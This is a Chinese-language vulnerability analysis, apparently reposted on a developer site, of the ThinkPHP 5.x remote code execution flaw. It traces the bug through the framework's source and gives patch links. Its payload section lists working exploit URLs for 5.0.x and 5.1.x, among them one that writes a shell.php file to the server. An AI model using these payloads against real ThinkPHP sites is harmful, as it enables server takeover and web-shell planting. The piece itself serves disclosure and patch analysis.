ThinkPHP 5.x RCE漏洞分析

栏目: PHP · 发布时间: 6年前

内容简介:我们请求的是当然还有很多其他payload,可以通过调用任意类的方法根据源码自行构造,这里只是做个记录。

ThinkPHP 5.x RCE漏洞分析 影响范围 

 5.x < 5.1.31  5.x <= 5.0.23

补丁地址

5.0:https://github.com/top-think/framework/commit/b797d72352e6b4eb0e11b6bc2a2ef25907b7756f

5.1:https://github.com/top-think/framework/commit/802f284bec821a608e7543d91126abc5901b2815

ThinkPHP 5.x RCE漏洞分析

漏洞分析

请求 public/index.php?s=index/think\request/input?data[]=phpinfo()&filter=assert

测试版本:ThinkPHP V5.1.1

根据补丁可知漏洞点在 library/think/route/dispatch/Module.php

可以看到 $controller 直接从URL调度中获取。

ThinkPHP 5.x RCE漏洞分析

接着实例化控制器,跟进 Controller 方法,对控制器分层,获取模块名和类名。

ThinkPHP 5.x RCE漏洞分析

跟进 parseModuleAndClass ,解析模块和类名并返回。并且如果 $name 包含了 \ ,则直接将 $name 当作类名,并直接返回。而命名空间就含有 \ ,所以可以利用命名空间来实例化任意类。

ThinkPHP 5.x RCE漏洞分析

回到 controller 方法,会判断类 $class 也就是 $name 是否存在

ThinkPHP 5.x RCE漏洞分析

不存在会调用 parseClass 方法,对命名空间类名等进行拼接并返回,然后会触发自动加载类并返回。

ThinkPHP 5.x RCE漏洞分析

最后会进入 invokeMethod ,调用反射执行类的方法,绑定请求的参数

ThinkPHP 5.x RCE漏洞分析

我们请求的是 think\request/input?data[]=phpinfo()&filter=assert ,跟进 Request 类的 input 方法。 

public function input($data = [], $name = '', $default = null, $filter = '')
    {
        if (false === $name) {
            // 获取原始数据
            return $data;
        }

        $name = (string) $name;
        if ('' != $name) {
            // 解析name
            if (strpos($name, '/')) {
                list($name, $type) = explode('/', $name);
            } else {
                $type = 's';
            }
            // 按.拆分成多维数组进行判断
            foreach (explode('.', $name) as $val) {
                if (isset($data[$val])) {
                    $data = $data[$val];
                } else {
                    // 无输入数据,返回默认值
                    return $default;
                }
            }
            if (is_object($data)) {
                return $data;
            }
        }

        // 解析过滤器
        $filter = $this->getFilter($filter, $default);

        if (is_array($data)) {
            array_walk_recursive($data, [$this, 'filterValue'], $filter);
            reset($data);
        } else {
            $this->filterValue($data, $name, $filter);
        }

        if (isset($type) && $data !== $default) {
            // 强制类型转换
            $this->typeCast($data, $type);
        }

        return $data;
    }

参数可控,因为 $data 为数组,则执行 array_walk_recursive($data, [$this, 'filterValue'], $filter); 。跟进 filterValue ,最终执行 call_user_func('assert','phpinfo()')

ThinkPHP 5.x RCE漏洞分析 因为windows会把pathinfo的 \ 替换成 /
ThinkPHP 5.x RCE漏洞分析

所以要使用兼容模式下的PATHINFO变量名s。

ThinkPHP 5.x RCE漏洞分析 ThinkPHP 5.x RCE漏洞分析

payload

当然还有很多其他payload,可以通过调用任意类的方法根据源码自行构造,这里只是做个记录。

from:https://xz.aliyun.com/t/3570

5.1.x php版本>5.5

http://127.0.0.1/index.php?s=index/think\request/input?data[]=phpinfo()&filter=assert

http://127.0.0.1/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()

http://127.0.0.1/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=<?php%20phpinfo();?>

5.0.x php版本>=5.4

http://127.0.0.1/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1

补丁分析

ThinkPHP 5.x RCE漏洞分析 补丁对控制器进行了正则过滤。

Referer


以上所述就是小编给大家介绍的《ThinkPHP 5.x RCE漏洞分析》,希望对大家有所帮助,如果大家有任何疑问请给我留言,小编会及时回复大家的。在此也非常感谢大家对 码农网 的支持!

查看所有标签

猜你喜欢:

本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们

码农书籍
我是90后,我是创业家

我是90后,我是创业家

腾讯互联网与社会研究院 / 华章图书 / 2015-1-1 / 48.00元

第1本揭秘17个90后精彩创业故事 他们是:脸萌创始人郭列、北大硕士卖米粉的张天一、微博《我只过1%的生活》短时间转发35万多次的伟大的安妮、备受争议的90后总裁余佳文、节操姐CEO陈桦……17位90后的创业家为你分享他们的创业故事!从这些90后孩子的经历中,还可以看到互联网带来的巨大好处,这又是这一代人的幸运。这些创业者有一个共同特点,即他们在做自己事业的时候,会经常遇到来自家庭和社会的阻......一起来看看 《我是90后,我是创业家》 这本书的介绍吧!

码农工具
RGB转16进制工具
RGB转16进制工具

RGB HEX 互转工具

MD5 加密
MD5 加密

MD5 加密工具

HEX HSV 转换工具
HEX HSV 转换工具

HEX HSV 互换工具

  • New
  • 文章
  • 话题
  • 教程
    • 关注 码农网 公众号
    版权所有,保留一切权利!© 2018-2025 码农网 粤ICP备17054400号-3